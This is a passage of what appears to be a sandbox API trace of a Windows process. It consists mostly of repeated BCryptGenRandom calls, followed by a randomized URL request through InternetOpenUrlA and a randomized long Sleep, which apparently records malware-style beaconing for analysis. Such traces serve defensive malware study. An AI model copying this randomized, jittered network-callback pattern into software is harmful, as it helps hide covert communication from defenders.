(hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.838] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.838] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.838] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.838] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.838] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.839] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.839] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.839] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.839] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.839] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.839] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.839] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.840] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.840] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.840] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.840] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.840] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.840] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.840] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.841] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.841] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.841] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.841] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.841] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.841] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.842] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.842] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.842] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.842] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.842] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.842] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.843] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.843] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.843] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.843] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.843] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.843] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.843] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.844] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.844] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.844] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.844] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.845] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.845] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.845] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0185.845] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.845] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a018d3, cbBuffer=0x2a, dwFlags=0x2 | out: pbBuffer=0x3a018d3) returned 0x0 [0185.845] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.845] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.846] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.847] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.847] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.847] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.848] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.848] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.848] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.848] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.848] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.848] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.849] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.849] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.849] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.849] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.849] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.849] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0185.849] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.849] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.850] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.850] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.850] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.850] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.850] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.850] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.850] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.851] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.851] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.851] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.851] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.851] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.851] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.851] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.852] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.852] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.852] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.852] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.852] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.852] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.852] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.852] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.853] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.853] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.853] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.853] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.853] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.853] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.854] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.854] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.854] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.854] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.854] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.854] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.855] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.855] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.855] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.855] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.855] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.855] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.855] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.855] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.856] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.856] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.856] GetProcessHeap () returned 0x440000 [0185.856] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473140 [0185.856] lstrcpyA (in: lpString1=0x473140, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0185.856] lstrcatA (in: lpString1="\x04", lpString2="/7uWoTmup3lyz8Dlscy62Gt9jhCcs2ib0qiuMjg/g1nb14mbnSd9snflZOt/vu5umh0H1qOdqn4ve1xt9gqb4ybFk0px1pvd42ajwpXR/kb3zhezr8rpqfO65inugY9xoj/bdvnelkkhBn28mkNkzr6LH4m0Tlrseeejp2qjXh5a/" | out: lpString1="\x04/7uWoTmup3lyz8Dlscy62Gt9jhCcs2ib0qiuMjg/g1nb14mbnSd9snflZOt/vu5umh0H1qOdqn4ve1xt9gqb4ybFk0px1pvd42ajwpXR/kb3zhezr8rpqfO65inugY9xoj/bdvnelkkhBn28mkNkzr6LH4m0Tlrseeejp2qjXh5a/") returned="\x04/7uWoTmup3lyz8Dlscy62Gt9jhCcs2ib0qiuMjg/g1nb14mbnSd9snflZOt/vu5umh0H1qOdqn4ve1xt9gqb4ybFk0px1pvd42ajwpXR/kb3zhezr8rpqfO65inugY9xoj/bdvnelkkhBn28mkNkzr6LH4m0Tlrseeejp2qjXh5a/" [0185.856] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0185.856] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/7uWoTmup3lyz8Dlscy62Gt9jhCcs2ib0qiuMjg/g1nb14mbnSd9snflZOt/vu5umh0H1qOdqn4ve1xt9gqb4ybFk0px1pvd42ajwpXR/kb3zhezr8rpqfO65inugY9xoj/bdvnelkkhBn28mkNkzr6LH4m0Tlrseeejp2qjXh5a/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0185.857] GetProcessHeap () returned 0x440000 [0185.857] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473140 | out: hHeap=0x440000) returned 1 [0185.857] GetProcessHeap () returned 0x440000 [0185.857] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a01850 | out: hHeap=0x440000) returned 1 [0185.857] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0185.857] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0185.858] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.858] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0185.858] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0185.858] Sleep (dwMilliseconds=0x1691d) [0186.073] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.073] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0186.074] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0186.074] GetProcessHeap () returned 0x440000 [0186.074] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f58f0 [0186.075] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.075] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0186.075] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.075] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f58f1, cbBuffer=0x2f, dwFlags=0x2 | out: pbBuffer=0x4f58f1) returned 0x0 [0186.075] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.075] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.076] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.076] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.076] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.076] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0186.076] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.076] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0186.076] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.263] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0186.263] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.263] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0186.264] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.264] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0186.264] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.264] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.264] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.264] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.264] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.264] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.265] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.265] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0186.265] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.265] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.265] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.265] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.265] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.265] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.266] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.266] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.266] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.266] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.266] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.267] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.267] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.267] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.267] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.267] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.267] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.267] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.268] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.268] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.268] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.268] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.268] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.268] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0186.269] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.269] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0186.269] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.269] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0186.269] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.269] BCryptGenRandom (in: 